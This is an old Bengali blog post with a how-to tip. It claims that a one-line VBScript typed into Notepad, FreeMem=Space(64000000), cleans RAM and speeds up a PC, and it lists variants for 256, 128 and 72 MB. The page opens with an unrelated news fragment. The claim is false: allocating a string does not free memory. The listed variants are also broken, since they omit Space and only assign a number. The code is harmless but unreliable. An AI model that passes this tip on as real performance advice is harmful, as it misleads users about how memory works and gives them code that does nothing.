ব্রেট কি নিয়ে কাজ করবেন তা অবশ্য এখনো খোলাসা করে বলেননি। ITndNEWSসূত্র : ইন্টারনেট
Apr 16, 2012
নোটপ্যাডের মাধ্যমে RAM Clean করে আপনার কম্পিউটারের স্পিড বাড়ান।
নোটপ্যাডের
মাধ্যমে
RAM Clean করে
আপনার কম্পিউটারের স্পিড বাড়ান।
আমাদের
Computer এ
যখন অনেক প্রোগ্রাম একসাথে তখন আমাদের কম্পিউটার বেশ Slow কাজ করে।এর প্রধান কারন হল RAM.কারন,যখন অনেক প্রোগ্রাম একসাথে চলে তখন RAM Full হয়ে যায়।এ অবস্থায় আমরা RAM কিছুটা Clean করে Computer এর Speed বাড়াতে পারি।সুতরাং আমাদেরকে যা করতে হবে তাহল,নোটপ্যাড ওপেন করে নিচের Command টি লিখতে হবে:
FreeMem=Space(64000000)
এবার
একে যেকোন ফাইল নেম দিয়ে .vbs ফাইল হিসেবে সেভ করুন।এবার ফাইলটিকে রান করালে কিছুটা RAM Clean
হবে এবং আপনার Computer টি দ্রুত কাজ করবে।
এছাড়াও
আপনি যদি আরও মেমরি ক্লিন করতে চান তবে নিচের Command গুলো দেখুন:
FreeMem= (256000000) for 256 mb
FreeMem= (128000000) for 128 mb
FreeMem= (72000000) for 72 mb
Subscribe to:
Posts (Atom)